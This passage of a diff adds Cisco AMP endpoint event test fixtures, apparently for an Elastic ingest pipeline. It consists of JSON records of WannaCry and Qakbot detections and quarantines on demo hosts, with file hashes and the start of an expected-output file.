Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline 
at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json new file mode 100644 index 00000000000..485829d5bda --- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json 
@@ -0,0 +1,5084 @@ +{ + "expected": [ + { + "process": { + "name": "mssecsvc.exe", + "pid": 6404, + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": "2021-01-14T17:39:50.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500123245Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat 
